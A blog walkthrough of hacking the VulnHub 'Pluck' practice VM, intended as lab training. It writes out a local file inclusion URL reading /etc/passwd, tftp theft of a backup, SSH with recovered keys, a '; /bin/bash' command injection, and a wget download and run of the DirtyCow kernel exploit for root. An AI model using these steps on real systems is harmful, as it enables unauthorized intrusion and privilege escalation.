Skip to content

Pluck Walkthrough (VulnHub)

Hello Hackers.
Welcome to my another walkthrough. at this  time we’ll look another VM, Pluck is a new VM in VulnHub and its very easy to hack. This Is very good for Newbie hackers for practice and explore their Hacking skills.

 

We know Target IP : 10.0.0.15 (in my case)

Download Link : https://download.vulnhub.com/pluck/pluck.ova.zip

 

Now lets Start our Walkthrough.


Scan VM using namp

COMMAND

nmap -p- -sV 10.0.0.15

now we know server’s port 80 open. that means server host any website .


Scan Vulnerability and Exploitin 

Explore this website and search vulnerability. When i visited its About and Contact us page i noticed  url , its showing me page=about.php parameter with .php file.

I  decided to try to exploit LFI( Local File Inclusion ) attack.

payload : /etc/passwd

URL look like : http://10.0.0.15/index.php?page=/etc/passwd

Note : at the end of file its leak Backup script file path and name (Highlighted in image above)

now url is : http://10.0.0.15/index.php?page=/usr/local/scripts/backup.sh

This script contain very usefull information (See Highlighted text in above pic)

now we know the server use tftp protocol for backup their data.

Lets Fireup our Terminal and type.

tftp 10.0.0.15

we know the backup file name backup.tar

tftp> get backup.tar

Goto your local directory and extract backup.tar

In Backup/home directory 3 user present but only paul have keys.

Using paul keys to login SSH (Try each key )

lets try ssh, Fireup ur terminal and type

ssh -i id_key4 paul@10.0.0.15

Pdmenu appear. Now there i stuck for some mins to figure out what next.

So, i Decided to select Edit file option in Pdmenu

when i click Edit file shows prompt for name.

in prompt i typed ” ; id ”  (without quotes) and enter.<–This vulnerability is know as Command Injection

When u press Enter Vim screen up just type ” :q ” (without quotes )

After exit Vim u can see ur next command output which u inject in prompt.

Do Again last to step : Goto Edit file but this time type “; /bin/bash ” in prompt.

if you do all the things correctly . below the output .

We got paul’s Shell.


Privilege Escalation

now the final step s privilege escalation. to get root privilege first check kernel version (there are many way to get root access )

uname -a

kernel version is : 4.8.0

Dirty cow is the best vulnerability for this version of kernel.

URL link : https://www.exploit-db.com/exploits/40616/

Download this exploit in paul’s home directory using wget command.

wget https://www.exploit-db.com/download/40616

mv 40616 dirtycow.c

now compile and run dirtycow.c

gcc dirtycow.c -o  dirtycow -pthread

./dirtycow

We Got root privilege. woooooooooooooooooh

cat /root/flag.txt

 

 

Thank you. Comment Below for more

 

 


Published inVulnHubWalkthrough

4 Comments

  1. That is a great tip especially to those fresh to
    the blogosphere. Short but very accurate information… Appreciate your
    sharing this one. A must read post!

    • Touhid Shaikh Touhid Shaikh

      thanks For Appreciating Me….

  2. Touche. Sound arguments. Keep up the amazing work.

  3. Hey very cool blog!! Man .. Excellent ..
    Wonderful .. I will bookmark your website and take the feeds additionally?
    I am happy to find numerous helpful info right
    here within the post, we need develop extra strategies on this regard, thank you for sharing.
    . . . . .

Leave a Reply

Your email address will not be published. Required fields are marked *